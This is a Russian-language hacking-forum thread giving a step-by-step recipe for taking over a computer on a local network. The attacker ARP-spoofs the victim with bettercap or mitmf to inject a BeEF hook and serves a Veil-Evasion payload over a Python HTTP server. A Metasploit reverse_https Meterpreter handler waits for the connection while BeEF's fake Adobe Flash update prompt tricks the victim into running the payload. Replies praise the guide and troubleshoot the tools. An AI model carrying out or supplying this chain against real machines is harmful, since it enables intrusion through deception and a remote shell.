Соц.инженерия или как доставить полезную нагрузку

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

заплатка.png


лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

запус beef.png

Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес



Login: beef
Pasword: beef

воод пароля beef.png


после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


1111.png


2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url " "

запуск bettercapa.png


где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

ifconfig.png


Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url

wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n

routen.png


Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102
(свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

beef левая колонка.png


Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :



последняя фаза beef.png


Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

На этом пока всё, спасибо за внимание. :)
 
Последнее редактирование:

shooter

Green Team
25.10.2016
184
146
BIT
0
Очешуенно же)

Давно сижу на форуме, всем спасибо, крайне приятно вас читать!
 
  • Нравится
Реакции: Jmatis

z3RoTooL

Grey Team
28.02.2016
803
697
BIT
10
лайк! мне было впадлу писать об этой связке )))) ты молодец. С меня репост.
 
  • Нравится
Реакции: kot-gor

Lisenok

Green Team
02.04.2016
133
75
BIT
1
Познавательно, буду пробовать)Благодарствую. Доучиться бы до момента когда сам смогу все это придумывать,находить.
 
  • Нравится
Реакции: SS35

Lisenok

Green Team
02.04.2016
133
75
BIT
1
Что за mitmf? у меня bettercap не пашет, ошибка такая "undefined method 'arp_opcode" for nil:NilClass" :( Если поможете буду благодарен!
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.
 

Lisenok

Green Team
02.04.2016
133
75
BIT
1
Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.
попробую, что выйдет отпишу. благодарю!
 
K

Knife

За пределами локальной сети эта связка неосуществима получается?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
За пределами локальной сети эта связка неосуществима получается?
За пределами локальной сети другая связка, уязвимость xss по другому немного эксплуатируется..здесь я показал самый простой пример.
 
Последнее редактирование:
L

Lamerman

Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
если в браузере..то скорее всего у вас не запустился сервер на 3000 порту.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает
 
L

Lamerman

можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает


15180450.jpg

15180416.jpg

15180431.jpg


Хочу обратить внимание - запуск идет не через beff-xss а через папку и ./beef
 
M

MAdDog719

Вопрос по Beef

Код:
http://xxx.xxx.xxx.xxx:3000/hook.js
вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
была таже проблема, решилась после переустановки кали
 
L

Lamerman

была таже проблема, решилась после переустановки кали


Координальное решение =) Ради интереса, я скачал beef с гитхаба и поставил его - результат тот же, видимо что то не хватает ему для успешной работы.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!